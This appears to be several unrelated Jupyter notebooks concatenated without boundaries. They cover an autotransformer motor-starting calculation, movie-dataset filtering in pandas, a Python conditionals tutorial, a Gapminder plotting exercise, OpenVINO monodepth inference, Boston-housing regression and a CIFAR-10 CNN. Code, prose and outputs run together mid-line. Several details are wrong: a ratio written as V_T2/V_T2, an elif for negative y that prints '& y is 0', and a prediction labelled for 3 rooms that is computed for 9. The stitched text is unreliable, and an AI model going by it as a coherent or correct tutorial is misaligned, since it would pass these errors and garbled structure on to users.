At start-up, the motor develops 1.75 times the full-load torque but draws 7 times the rated current at the rated voltage. This motor is to be started with an autotransformer reduced voltage starter. (a) * What should the output voltage of the starter circuit be to reduce the starting torque until it equals the rated torque of the motor? (b) * What will the motor starting current and the current drawn from the supply be at this voltage?Vt = 460 # [V] Wperhp = 746 # official conversion rate of "electrical horsepowers" Pout = 50 * Wperhp # [W] PF = 0.87 eta = 0.91 times_tor = 1.75 times_cur = 7SOLUTION (a)The starting torque of an induction motor is proportional to the square of $V_{TH}$ ,$$\frac{\tau_\text{start2}}{\tau_\text{start1}} = \left(\frac{V_\text{TH2}}{V_\text{TH1}}\right)^2 = \left(\frac{V_\text{T2}}{V_\text{T2}}\right)^2$$ If a torque of 1.75 $\tau_{rated}$ is produced by a voltage of 460 V, then a torque of 1.00 $\tau_\text{rated}$ would be produced by a voltage of:$$\frac{1.00\tau_\text{rated}}{1.75\tau_\text{rated}} = \left(\frac{V_{T2}}{460V}\right)^2$$Vt2 = sqrt(1.00/times_tor * Vt**2) print(''' Vt2 = {:.0f} V ==========='''.format(Vt2))Vt2 = 348 V ===========(b)The motor starting current is directly proportional to the starting voltage, so$$I_{L2} = \left(\frac{V_{T2}}{V_T}\right)I_{L1}$$Il2_Il1 = Vt2/Vt Il1_Irated = times_cur Il2_Irated = Il2_Il1 * Il1_Irated print(''' Il2 = {:.2f} Irated ================='''.format(Il2_Irated))Il2 = 5.29 Irated =================The input power to this motor is:$$P_\text{in} = \frac{P_\text{out}}{\eta}$$Pin = Pout / eta print('Pin = {:.1f} kW'.format(Pin/1000))Pin = 41.0 kWThe rated current is equal to:$$I_\text{rated} = \frac{P_\text{in}}{\sqrt{3}V_TPF}$$Irated = Pin / (sqrt(3)*Vt*PF) print('Irated = {:.2f} A'.format(Irated))Irated = 59.13 ATherefore, the motor starting current isIl2 = Il2_Irated * Irated print(''' Il2 = {:.1f} A ============='''.format(Il2))Il2 = 312.9 A =============The turns ratio of the autotransformer that produces this starting voltage is:$$\frac{N_{SE}+N_C}{N_C} = \frac{V_T}{V_{T2}} = a$$a = Vt/Vt2 print('a = {:.3f}'.format(a))a = 1.323so the current drawn from the supply will be:$$I_\text{line} = \frac{I_\text{start}}{a}$$Iline = Il2 / a print(''' Iline = {:.0f} A ============='''.format(Iline))Iline = 237 A =============Filtering Datasetimport pandas as pd import csv**Reading dataset without Box Office**movie = pd.read_csv('dataset02.csv') movie.head(3)**Filtering data with YEAR range 1990-2014 and COUNTRY as USA and LANGUAGE as English**filteringDataset = movie[(movie.YEAR >= 1990) & (movie.YEAR <= 2014) & (movie.COUNTRY.str.contains('USA') & (movie.LANGUAGE.str.contains('English')))]** Creating a dataframe and checking for multiple IMDB ID's **datasetDataframe = pd.DataFrame(filteringDataset) datasetDataframe['IMDB ID'].value_counts()[0:3]** One IMDB ID multiple entry found 'tt2279864' **datasetDataframe[datasetDataframe['IMDB ID'] == 'tt2279864']** Getting the correct row of IMDB ID 'tt2279864' **idtt2279864 = datasetDataframe.loc[25630]** Dataframe without IMDB ID 'tt2279864' **without_tt2279864 = datasetDataframe[datasetDataframe['IMDB ID'] != 'tt2279864']** Appending the single entry of IMDB ID 'tt2279864' to Dataframe without IMDB ID 'tt2279864' **finalDataset = without_tt2279864.append(idtt2279864, ignore_index=True)** No multiple entries of IMDB ID found **finalDataset['IMDB ID'].value_counts()[0:3]** Converting Dataframe to csv **finalDataset.to_csv('datasetWithoutBoxOffice.csv', 
index=False)[![AnalyticsDojo](https://github.com/rpi-techfundamentals/spring2019-materials/blob/master/fig/final-logo.png?raw=1)](http://introml.analyticsdojo.com)Introduction to Python - Conditional Statements and Loopsintroml.analyticsdojo.com Conditional Statements and Loops- (Need to know) Indentation in Python- What are conditional statements? Why do we need them?- If statements in Python- Why, Why not Loops?- Loops in Python- Exercises [Tabs vs Spaces](https://www.youtube.com/watch?v=SsoOG6ZeyUI)(Worth Watching) Indentation in Python- Indentation has a very specific role in Python and is **important!**- It is used as alternative to parenthesis, and getting it wrong will cause errors. - Python 3 allows 4 spaces or tabs, but not both. [But in working in Jupyter seems to work fine.]- In Python, spaces are preferred according to the [PEP 8 style guide](https://www.python.org/dev/peps/pep-0008/). What are conditional statements? Why do we need them? `if` Statements- Enables logical branching and recoding of data.- BUT, `if statements` can result in long code branches, repeated code.- Best to keep if statements short.- Keep in mind the [Zen of Python](https://www.python.org/dev/peps/pep-0020/) when writing if statements. Conditional Statements and Indentation- The syntax for control structures in Python use _colons_ and _indentation_.- Beware that indentation affects flow.- `if` statemenet enable logic. - `elif` give additional conditions.- `else` gives what to do if other conditions are not met.y = 5 x = 3 if x > 0: print ('x is strictly positive') print (x) print ('Finished.', x, y) x x = 1 y = 0 if x > 0: print ('x is greater than 0') if y > 0: print ('& y is also greater than 0') elif y<0: print ('& y is 0') else: print ('& y is equal 0') print ("x: ",x) print ('Finished.') x > 0 x != 5 or x=5 xPython Logit and Conditions- Less than <- Greater than >- Less than or equal ≤ <=- Greater than or equal >=- Equals ==- Not equal !=- `and` can be used to put multiple logical expressions together.- `or` can be used to put multiple logical expressions together.x = -1 y = 1 if x >= 0 and y >= 0: print ('x and y are greater than 0 or 0') elif x >= 0 or y >= 0: if x > 0: print ('x is greater than 0') else: print ('y is greater than 0') else: print ('neither x nor y greater than 0')y is greater than 0Python Conditionals (Alt Syntax) - Clean syntax doesn't get complex branching - Python ternary conditional operator `(falseValue, trueValue)[]`- Lambda Functions as if statement.x=0 z = 5 if x > 0 else 0 print(z) # This is a form of if statement called ternary conditional operator x=1 #The first value is the value if the conditional is false z=(0, 5)[x>0] print(z)5Why, Why Not Loops?- Iterate over arrays or lists easily. `for` or `while` loops can be nested.- BUT, in many cases for loops don't scale well and are slower than alternate methods involving functions. - BUT, don't worry about prematurely optimizing code.- Often if you are doing a loop, there is a function that is faster. You might not care for small data applications.- Keep in mind the [Zen of Python](https://www.python.org/dev/peps/pep-0020/id3) when writing `for` statements.#Here we are iterating on lists. 
sum=0 for ad in [1, 2, 3]: sum+=ad #This is short hand for sum = sum+ad print(sum) for country in ['England', 'Spain', 'India']: print(country) x=[0,1,2] y=['a','b','c'] #Nested for loops for a in x: for b in y: print(a,b)0 a 0 b 0 c 1 a 1 b 1 c 2 a 2 b 2 cThe `for` Loop- Can accept a `range(start, stop, step)` or `range(stop)` object- Can break out of it with a `break` commandz=range(5) z #Range is a built in function that can be passed to a for loop #https://docs.python.org/3/library/functions.html#func-range #Range accepts a number and a (start/stop/step) like the arrange command. z=range(5) print(z, type(z)) #Range for i in z: print('Printing ten') for i in range(5): print('Print five more') for i in range(5,20,2): print('i: %d is the value' % (i)) print(f'i:{i} is the value' ) #This is an alternate way of embedding values in text. #Sometimes you need to break out of a loop for x in range(3): print('x:',x) if x == 2: breakx: 0 x: 1 x: 2List, Set, and Dict Comprehension (Fancy for Loops)- Python has a special way of compressing list building to a single line. - Set Comprehension is very similar, but with the `{` bracket.- Can incorporate conditionals. - S#This is the long way of building lists. L = [] for n in range(10): L.append(n ** 2) L #With list comprehension. L=[n ** 2 for n in range(10)] L #Any actions are on left side, any conditionals on right side [i for i in range(20) if i % 3 == 0]Multiple Interators- Iterating on multiple values[(i, j) for i in range(2) for j in range(3)]Set Comprehension- Remember sets must have unique values.#We can change it to a setby just changing the brackets. {n**2 for n in range(6)}Dict Comprehension- Remember sets must have unique values.#We can change it to a dictionary by just changing the brackets and adding a colon. {n:n**2 for n in range(6)}While Loops- Performs a loop while a conditional is True.- Doesn't auto-increment.# While loop is a very interesting x = 1 sum=0 while x<10: print ("Printing x= %d sum= %d" % (x, sum)) #Note this alternate way of specufiy x += 1 sum+=10Printing x= 1 sum= 0 Printing x= 2 sum= 10 Printing x= 3 sum= 20 Printing x= 4 sum= 30 Printing x= 5 sum= 40 Printing x= 6 sum= 50 Printing x= 7 sum= 60 Printing x= 8 sum= 70 Printing x= 9 sum= 80Recoding Variables/Creating Features with `for/if`- Often we want to recode data applying some type of conditional statement to each value of a series, list, or column of a data frame.- [Regular Expressions](https://docs.python.org/3/howto/regex.html) can be useful in recoding#Titanic Preview Women and Children first gender=['Female', 'Female','Female', 'Male', 'Male', 'Male' ] age=[75, 45, 15, 1, 45, 4 ] name = ['Ms. ', 'Mrs. ', '', 'Rev. ' ] survived=[] for i in range(len(gender)): #This is encoding a simple model that women survived. 
if gender[i]=='Female': survived.append('Survived') else: survived.append('Died') print(survived) #BUT, we won't typically be using this type of recoding, so we aren't going to do a lot of exercises on it.['Survived', 'Survived', 'Survived', 'Died', 'Died', 'Died']_Lambda School Data Science_ Sequence your narrativeToday we will create a sequence of visualizations inspired by ['s 200 Countries, 200 Years, 4 Minutes](https://www.youtube.com/watch?v=jbkSRLYSojo).Using this [data from Gapminder](https://github.com/open-numbers/ddf--gapminder--systema_globalis/):- [Income Per Person (GDP Per Capital, Inflation Adjusted) by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--income_per_person_gdppercapita_ppp_inflation_adjusted--by--geo--time.csv)- [Life Expectancy (in Years) by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--life_expectancy_years--by--geo--time.csv)- [Population Totals, by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--population_total--by--geo--time.csv)- [Entities](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--entities--geo--country.csv)- [Concepts](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--concepts.csv) Objectives- sequence multiple visualizations- combine qualitative anecdotes with quantitative aggregatesLinks- [’s TED talks](https://www.ted.com/speakers/hans_rosling)- [Spiralling global temperatures from 1850-2016](https://twitter.com/ed_hawkins/status/729753441459945474)- "[The Pudding](https://pudding.cool/) explains ideas debated in culture with visual essays."- [A Data Point Walks Into a Bar](https://lisacharlotterost.github.io/2016/12/27/datapoint-in-bar/): a thoughtful blog post about emotion and empathy in data storytelling Make a plan How to present the data?Variables --> Visual Encodings- Income --> x- Lifespan --> y- Region --> color- Population --> size- Year --> animation frame (alternative: small multiple)- Country --> annotationQualitative --> Verbal- Editorial / contextual explanation --> audio narration (alternative: text) How to structure the data?| Year | Country | Region | Income | Lifespan | Population ||------|---------|----------|--------|----------|------------|| 1818 | USA | Americas | | | || 1918 | USA | Americas | | | || 2018 | USA | Americas | | | || 1818 | China | Asia | | | || 1918 | China | Asia | | | || 2018 | China | Asia | | | | More imports%matplotlib inline import matplotlib.pyplot as plt import numpy as np import pandas as pdLoad & look at dataincome = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--income_per_person_gdppercapita_ppp_inflation_adjusted--by--geo--time.csv') lifespan = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--life_expectancy_years--by--geo--time.csv') population = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--population_total--by--geo--time.csv') entities = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--entities--geo--country.csv') concepts = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--concepts.csv') 
income.shape, lifespan.shape, population.shape, entities.shape, concepts.shape income.head() lifespan.head() population.head() pd.options.display.max_columns = 500 entities.head() concepts.head()Merge data https://github.com/pandas-dev/pandas/blob/master/doc/cheatsheet/Pandas_Cheat_Sheet.pdf# merge income and lifespan csv files df = pd.merge(income, lifespan) df.shape df = pd.merge(df, population) df.shape entities_variables = ['country', 'name', 'world_6region'] entities = entities[entities_variables] print(entities.shape) entities.head() entities['world_6region'].value_counts() merged = pd.merge(df, entities, left_on='geo', right_on='country') print(merged.shape) df.head() merged = merged.drop(['geo', 'country'], axis='columns') merged.head() merged = merged.rename(columns = { 'time': 'year', 'income_per_person_gdppercapita_ppp_inflation_adjusted': 'income', 'life_expectancy_years': 'lifespan', 'population_total': 'population', 'name': 'country', 'world_6region': 'region' }) merged.head() merged.head()Explore datamerged.dtypes merged.describe() merged.describe(exclude='number') merged.country.unique() usa = merged[merged.country=="United States"] usa.head() usa[usa.year.isin([1818, 1918, 2018])] china = merged[merged.country=="China"] china.head() china[china.year.isin([1818, 1918, 2018])]Plot visualization Changed title on graph, adjusted size of markers on graph, set style to 'whitegrid'import seaborn as sns year_2018= merged[merged['year'] == 2018] sns.set_style("whitegrid") sns.relplot(x='income', y='lifespan', hue='region', size='population', sizes=(20, 500), data=year_2018) plt.title("Income Per Person GDP Per Capita PPP Inflation Adjusted") plt.text(x=40000.0, y=85, s="Income vs Lifespan by Country") plt.show();Analyze outliersqatar_year_2018 = year_2018[(year_2018.income > 80000) & (year_2018.country == 'Qatar')].sort_values(by='income') qatar_year_2018 sns.relplot(x='income', y='lifespan', hue='region', size='population', sizes=(20, 460), data=year_2018); plt.text(x=qatar_year_2018.income, y=qatar_year_2018.lifespan + 1, s='Qatar') plt.title("Income Per Person GDP Per Capita PPP Inflation Adjusted") plt.text(x=30000.0, y=85, s="2018 Qatar Outlier Displayed") plt.show();Plot multiple yearsyears = [1818, 1918, 2018] centuries = merged[merged.year.isin(years)] sns.relplot(x='income', y='lifespan', hue='region', size='population', col='year', data=centuries) plt.xscale('log'); plt.text(x=qatar_year_2018.income-5000, y=qatar_year_2018.lifespan + 1, s='Qatar');Point out a storyyears = [1918, 1938, 1958, 1978, 1998, 2018] decades = merged[merged.year.isin(years)] sns.relplot(x='income', y='lifespan', hue='region', size='population', sizes=(20, 400), col='year', data=decades); for year in years: sns.relplot(x='income', y='lifespan', hue='region', size='population', sizes=(20, 600), data=merged[merged.year==year]) plt.xscale('log') plt.xlim((150, 150000)) plt.ylim((0, 90)) plt.title(year) plt.axhline(y=50, color='grey') merged[(merged.year==1918) & (merged.lifespan >50)] merged[(merged.year==2018) & (merged.lifespan <50)] year = 1883 #@param {type:"slider", min:1800, max:2018, step:1} sns.relplot(x='income', y='lifespan', hue='region', size='population', data=merged[merged.year==year]) plt.xscale('log') plt.xlim((150, 150000)) plt.ylim((20, 90)) plt.title(year);Monodepth Estimation with OpenVINOThis tutorial demonstrates Monocular Depth Estimation with MidasNet in OpenVINO. 
Model information: https://docs.openvinotoolkit.org/latest/omz_models_model_midasnet.html ![monodepth](https://user-images.githubusercontent.com/36741649/127173017-a0bbcf75-db24-4d2c-81b9-616e04ab7cd9.gif) What is Monodepth?Monocular Depth Estimation is the task of estimating scene depth using a single image. It has many potential applications in robotics, 3D reconstruction, medical imaging and autonomous systems. For this demo, we use a neural network model called [MiDaS](https://github.com/intel-isl/MiDaS) which was developed by the [Embodied AI Foundation](https://www.embodiedaifoundation.org/). Check out the research paper below to learn more. , , , and , ["Towards Robust Monocular Depth Estimation: Mixing Datasets for Zero-shot Cross-dataset Transfer,"](https://ieeexplore.ieee.org/document/9178977) in IEEE Transactions on Pattern Analysis and Machine Intelligence, doi: 10.1109/TPAMI.2020.3019967. Preparation Importsimport sys import time from pathlib import Path import cv2 import matplotlib.cm import matplotlib.pyplot as plt import numpy as np from IPython.display import ( HTML, FileLink, Pretty, ProgressBar, Video, clear_output, display, ) from openvino.inference_engine import IECore sys.path.append("../utils") from notebook_utils import load_imageSettingsDEVICE = "CPU" MODEL_FILE = "model/MiDaS_small.xml" model_xml_path = Path(MODEL_FILE)Functionsdef normalize_minmax(data): """Normalizes the values in `data` between 0 and 1""" return (data - data.min()) / (data.max() - data.min()) def convert_result_to_image(result, colormap="viridis"): """ Convert network result of floating point numbers to an RGB image with integer values from 0-255 by applying a colormap. `result` is expected to be a single network result in 1,H,W shape `colormap` is a matplotlib colormap. See https://matplotlib.org/stable/tutorials/colors/colormaps.html """ cmap = matplotlib.cm.get_cmap(colormap) result = result.squeeze(0) result = normalize_minmax(result) result = cmap(result)[:, :, :3] * 255 result = result.astype(np.uint8) return result def to_rgb(image_data) -> np.ndarray: """ Convert image_data from BGR to RGB """ return cv2.cvtColor(image_data, cv2.COLOR_BGR2RGB)Load the ModelLoad the model in Inference Engine with `ie.read_network` and load it to the specified device with `ie.load_network`. 
Get input and output keys and the expected input shape for the model.ie = IECore() net = ie.read_network(model=model_xml_path, weights=model_xml_path.with_suffix(".bin")) exec_net = ie.load_network(network=net, device_name=DEVICE) input_key = list(exec_net.input_info)[0] output_key = list(exec_net.outputs.keys())[0] network_input_shape = exec_net.input_info[input_key].tensor_desc.dims network_image_height, network_image_width = network_input_shape[2:]Monodepth on Image Load, resize and reshape input imageThe input image is read with OpenCV, resized to network input size, and reshaped to (N,C,H,W) (N=number of images, C=number of channels, H=height, W=width).IMAGE_FILE = "data/coco_bike.jpg" image = load_image(path=IMAGE_FILE) # resize to input shape for network resized_image = cv2.resize(src=image, dsize=(network_image_height, network_image_width)) # reshape image to network input shape NCHW input_image = np.expand_dims(np.transpose(resized_image, (2, 0, 1)), 0)Do inference on imageDo the inference, convert the result to an image, and resize it to the original image shaperesult = exec_net.infer(inputs={input_key: input_image})[output_key] # convert network result of disparity map to an image that shows # distance as colors result_image = convert_result_to_image(result=result) # resize back to original image shape. cv2.resize expects shape # in (width, height), [::-1] reverses the (height, width) shape to match this result_image = cv2.resize(result_image, image.shape[:2][::-1])Display monodepth imagefig, ax = plt.subplots(1, 2, figsize=(20, 15)) ax[0].imshow(to_rgb(image)) ax[1].imshow(result_image);Monodepth on VideoBy default, only the first 100 frames are processed, in order to quickly check that everything works. Change NUM_FRAMES in the cell below to modify this. Set NUM_FRAMES to 0 to process the whole video. Video Settings# Video source: https://www.youtube.com/watch?v=fu1xcQdJRws (Public Domain) VIDEO_FILE = "data/Coco Walking in Berkeley.mp4" # Number of seconds of input video to process. Set to 0 to process # the full video. NUM_SECONDS = 4 # Set ADVANCE_FRAMES to 1 to process every frame from the input video # Set ADVANCE_FRAMES to 2 to process every second frame. This reduces # the time it takes to process the video ADVANCE_FRAMES = 2 # Set SCALE_OUTPUT to reduce the size of the result video # If SCALE_OUTPUT is 0.5, the width and height of the result video # will be half the width and height of the input video SCALE_OUTPUT = 0.5 # The format to use for video encoding. vp09 is slow, # but it works on most systems. # Try the THEO encoding if you have FFMPEG installed. # FOURCC = cv2.VideoWriter_fourcc(*"THEO") FOURCC = cv2.VideoWriter_fourcc(*"vp09") # Create Path objects for the input video and the resulting video output_directory = Path("output") output_directory.mkdir(exist_ok=True) result_video_path = output_directory / f"{Path(VIDEO_FILE).stem}_monodepth.mp4"Load VideoLoad video from `VIDEO_FILE`, set in the *Video Settings* cell above. 
Open the video to read the frame width and height and fps, and compute values for these properties for the monodepth video.cap = cv2.VideoCapture(str(VIDEO_FILE)) ret, image = cap.read() if not ret: raise ValueError(f"The video at {VIDEO_FILE} cannot be read.") input_fps = cap.get(cv2.CAP_PROP_FPS) input_video_frame_height, input_video_frame_width = image.shape[:2] target_fps = input_fps / ADVANCE_FRAMES target_frame_height = int(input_video_frame_height * SCALE_OUTPUT) target_frame_width = int(input_video_frame_width * SCALE_OUTPUT) cap.release() print( f"The input video has a frame width of {input_video_frame_width}, " f"frame height of {input_video_frame_height} and runs at {input_fps:.2f} fps" ) print( "The monodepth video will be scaled with a factor " f"{SCALE_OUTPUT}, have width {target_frame_width}, " f" height {target_frame_height}, and run at {target_fps:.2f} fps" )Do Inference on a Video and Create Monodepth Video# Initialize variables input_video_frame_nr = 0 start_time = time.perf_counter() total_inference_duration = 0 # Open input video cap = cv2.VideoCapture(str(VIDEO_FILE)) # Create result video out_video = cv2.VideoWriter( str(result_video_path), FOURCC, target_fps, (target_frame_width * 2, target_frame_height), ) num_frames = int(NUM_SECONDS * input_fps) total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT) if num_frames == 0 else num_frames progress_bar = ProgressBar(total=total_frames) progress_bar.display() try: while cap.isOpened(): ret, image = cap.read() if not ret: cap.release() break if input_video_frame_nr >= total_frames: break # Only process every second frame # Prepare frame for inference # resize to input shape for network resized_image = cv2.resize(src=image, dsize=(network_image_height, network_image_width)) # reshape image to network input shape NCHW input_image = np.expand_dims(np.transpose(resized_image, (2, 0, 1)), 0) # Do inference inference_start_time = time.perf_counter() result = exec_net.infer(inputs={input_key: input_image})[output_key] inference_stop_time = time.perf_counter() inference_duration = inference_stop_time - inference_start_time total_inference_duration += inference_duration if input_video_frame_nr % (10 * ADVANCE_FRAMES) == 0: clear_output(wait=True) progress_bar.display() # input_video_frame_nr // ADVANCE_FRAMES gives the number of # frames that have been processed by the network display( Pretty( f"Processed frame {input_video_frame_nr // ADVANCE_FRAMES}" f"/{total_frames // ADVANCE_FRAMES}. " f"Inference time: {inference_duration:.2f} seconds " f"({1/inference_duration:.2f} FPS)" ) ) # Transform network result to RGB image result_frame = to_rgb(convert_result_to_image(result)) # Resize image and result to target frame shape result_frame = cv2.resize(result_frame, (target_frame_width, target_frame_height)) image = cv2.resize(image, (target_frame_width, target_frame_height)) # Put image and result side by side stacked_frame = np.hstack((image, result_frame)) # Save frame to video out_video.write(stacked_frame) input_video_frame_nr = input_video_frame_nr + ADVANCE_FRAMES cap.set(1, input_video_frame_nr) progress_bar.progress = input_video_frame_nr progress_bar.update() except KeyboardInterrupt: print("Processing interrupted.") finally: clear_output() processed_frames = num_frames // ADVANCE_FRAMES out_video.release() cap.release() end_time = time.perf_counter() duration = end_time - start_time print( f"Processed {processed_frames} frames in {duration:.2f} seconds. " f"Total FPS (including video processing): {processed_frames/duration:.2f}." 
f"Inference FPS: {processed_frames/total_inference_duration:.2f} " ) print(f"Monodepth Video saved to '{str(result_video_path)}'.")Display Monodepth Videovideo = Video(result_video_path, width=800, embed=True) if not result_video_path.exists(): plt.imshow(stacked_frame) raise ValueError("OpenCV was unable to write the video file. Showing one video frame.") else: print(f"Showing monodepth video saved at\n{result_video_path.resolve()}") print( "If you cannot see the video in your browser, please click on the " "following link to download the video " ) video_link = FileLink(result_video_path) video_link.html_link_str = "%s" display(HTML(video_link._repr_html_())) display(video)Linear Regresionimport sklearn as skl import numpy as np import scipy as sc import matplotlib.pyplot as plt from sklearn.datasets import load_boston from sklearn import linear_model from sklearn.metrics import mean_squared_error boston_dataset = load_boston() print(boston_dataset.DESCR) X = boston_dataset.data Y = boston_dataset.target n, p = X.shape print(boston_dataset.DESCR).. _boston_dataset: Boston house prices dataset --------------------------- **Data Set Characteristics:** :Number of Instances: 506 :Number of Attributes: 13 numeric/categorical predictive. Median Value (attribute 14) is usually the target. :Attribute Information (in order): - CRIM per capita crime rate by town - ZN proportion of residential land zoned for lots over 25,000 sq.ft. - INDUS proportion of non-retail business acres per town - CHAS Charles River dummy variable (= 1 if tract bounds river; 0 otherwise) - NOX nitric oxides concentration (parts per 10 million) - RM average number of rooms per dwelling - AGE proportion of owner-occupied units built prior to 1940 - DIS weighted distances to five Boston employment centres - RAD index of accessibility to radial highways - TAX full-value property-tax rate per $10,000 - PTRATIO pu[...]Analysis of Data---print("---") print("coefficent of Correlationship:", np.corrcoef(X[:, 5], Y)[0, 1]) print("---") mask = np.logical_and(X[:,5] > 5, X[:,5] < 6) print("Mean value of house with RM between -> 5 > RM > 6 :", np.mean(Y[mask])) plt.title("RM vs MDEV") plt.xlabel("Mean rooms (RM)") plt.ylabel("Mean Value House (MDEV)") plt.scatter(X[:, 5], Y, alpha=0.4) plt.show() plt.hist(Y, bins=120) plt.ylabel('Examples') plt.xlabel('Prize -> miles $') plt.show() print('''Abnormal mean home value for exactly $ 50,000. Possible truncation''')--- coefficent of Correlationship: 0.695359947071539 --- Mean value of house with RM between -> 5 > RM > 6 : 17.551592356687898Simple Linear Regression - Ordinary least squares $ W = (X^TX)^{-1}X^TY $ --- Mean Squared Error $ \operatorname{MSE}=\frac{1}{n}\sum_{i=1}^n(Y_{Pi} - Y_i)^2. 
$ ---plt.title("Linear Regression") plt.scatter(X[:, 5], Y, alpha=0.5) plt.xlabel("Mean numbers of rooms (RM)") plt.ylabel("Mean value of home (MDEV)") aX = np.hstack((np.ones((n,1)), X[:,5:6])) _Y = Y[:, np.newaxis] # Linear regression aplication W = np.linalg.inv(aX.T @ aX) @ aX.T @ _Y # Plot the regression x0 = [4, 9] plt.plot(x0, [W[0, 0] + W[1, 0] * x0[0], W[0, 0] + W[1, 0] * x0[1]], c="red") plt.show() print("---") print("Value predicted for a home with 3 rooms: ", [1, 9] @ W) print("Mean rooms in homes for 45.000$: ", (45 - W[0])/W[1]) print("---") Yp = aX @ W MSE = lambda Yp, Y: np.mean(np.power(Yp - Y[:, np.newaxis], 2)) print("Mean Squared Error:", MSE(Yp, Y))Simple Linear Regression with Sklearn.---regr = linear_model.LinearRegression() regr.fit(X[:, 5:6], Y[:, np.newaxis]) y_pred = regr.predict([[9]]) print(regr.coef_, regr.intercept_) print(y_pred) print(mean_squared_error(Y, regr.predict(X[:, 5:6])))[[9.10210898]] [-34.67062078] [[47.24836005]] 43.60055177116956Multiple Linear Regression $ W = (X^TX)^{-1}X^TY $ ---regr = linear_model.LinearRegression() regr.fit(aX, Y[:, np.newaxis]) print("---") print(regr.intercept_, regr.coef_) print("Mean Squared Error :", mean_squared_error(Y, regr.predict(aX)))--- [18.56711151] [[ 0. 4.51542094 -0.93072256 -0.57180569]] Mean Squared Error : 27.130405758497062Artificial Intelligence Nanodegree Convolutional Neural Networks---In this notebook, we train a CNN to classify images from the CIFAR-10 database. 1. Load CIFAR-10 Databaseimport keras from keras.datasets import cifar10 # load the pre-shuffled train and test data (x_train, y_train), (x_test, y_test) = cifar10.load_data()Using TensorFlow backend.2. Visualize the First 24 Training Imagesimport numpy as np import matplotlib.pyplot as plt %matplotlib inline fig = plt.figure(figsize=(20,5)) for i in range(36): ax = fig.add_subplot(3, 12, i + 1, xticks=[], yticks=[]) ax.imshow(np.squeeze(x_train[i]))3. Rescale the Images by Dividing Every Pixel in Every Image by 255# rescale [0,255] --> [0,1] x_train = x_train.astype('float32')/255 x_test = x_test.astype('float32')/2554. Break Dataset into Training, Testing, and Validation Setsfrom keras.utils import np_utils # one-hot encode the labels num_classes = len(np.unique(y_train)) y_train = keras.utils.to_categorical(y_train, num_classes) y_test = keras.utils.to_categorical(y_test, num_classes) # break training set into training and validation sets (x_train, x_valid) = x_train[5000:], x_train[:5000] (y_train, y_valid) = y_train[5000:], y_train[:5000] # print shape of training set print('x_train shape:', x_train.shape) # print number of training, validation, and test images print(x_train.shape[0], 'train samples') print(x_test.shape[0], 'test samples') print(x_valid.shape[0], 'validation samples')x_train shape: (45000, 32, 32, 3) 45000 train samples 10000 test samples 5000 validation samples5. 
Define the Model Architecturefrom keras.models import Sequential from keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, Activation # My modified model model = Sequential() model.add(Conv2D(filters=32, kernel_size=4, padding='same', input_shape=x_train.shape[1:])) model.add(Activation('relu')) model.add(Conv2D(filters=64, kernel_size=4, padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=2)) model.add(Dropout(0.15)) model.add(Conv2D(filters=128, kernel_size=4, padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=4)) model.add(Dropout(0.25)) model.add(Conv2D(filters=256, kernel_size=4, padding='same')) model.add(MaxPooling2D(pool_size=4)) model.add(Dropout(0.35)) # model.add(Conv2D(filters=512, kernel_size=4, padding='same')) model.add(Dropout(0.45)) model.add(Flatten()) model.add(Dense(512)) model.add(Activation('relu')) model.add(Dropout(0.55)) model.add(Dense(num_classes)) model.add(Activation('softmax')) # Original model # model = Sequential() # model.add(Conv2D(filters=16, kernel_size=2, padding='same', activation='relu', # input_shape=(32, 32, 3))) # model.add(MaxPooling2D(pool_size=2)) # model.add(Conv2D(filters=32, kernel_size=2, padding='same', activation='relu')) # model.add(MaxPooling2D(pool_size=2)) # model.add(Conv2D(filters=64, kernel_size=2, padding='same', activation='relu')) # model.add(MaxPooling2D(pool_size=2)) # model.add(Dropout(0.3)) # model.add(Flatten()) # model.add(Dense(500, activation='relu')) # model.add(Dropout(0.4)) # model.add(Dense(10, activation='softmax')) model.summary()_________________________________________________________________ Layer (type) Output Shape Param # ================================================================= conv2d_32 (Conv2D) (None, 32, 32, 32) 1568 _________________________________________________________________ activation_25 (Activation) (None, 32, 32, 32) 0 _________________________________________________________________ conv2d_33 (Conv2D) (None, 32, 32, 64) 32832 _________________________________________________________________ activation_26 (Activation) (None, 32, 32, 64) 0 _________________________________________________________________ max_pooling2d_18 (MaxPooling (None, 16, 16, 64) 0 _________________________________________________________________ dropout_21 (Dropout) (None, 16, 16, 64) 0 _________________________________________________________________ conv2d_34 [...]6. Compile the Model# compile the model model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])7. Train the Modelfrom keras.callbacks import ModelCheckpoint # train the model checkpointer = ModelCheckpoint(filepath='model.weights.best.hdf5', verbose=1, save_best_only=True) hist = model.fit(x_train, y_train, batch_size=32, epochs=100, validation_data=(x_valid, y_valid), callbacks=[checkpointer], verbose=2, shuffle=True)8. Load the Model with the Best Validation Accuracy# load the weights that yielded the best validation accuracy model.load_weights('model.weights.best.hdf5')9. Calculate Classification Accuracy on Test Set# evaluate and print test accuracy score = model.evaluate(x_test, y_test, verbose=0) print('\n', 'Test accuracy:', score[1])10. 
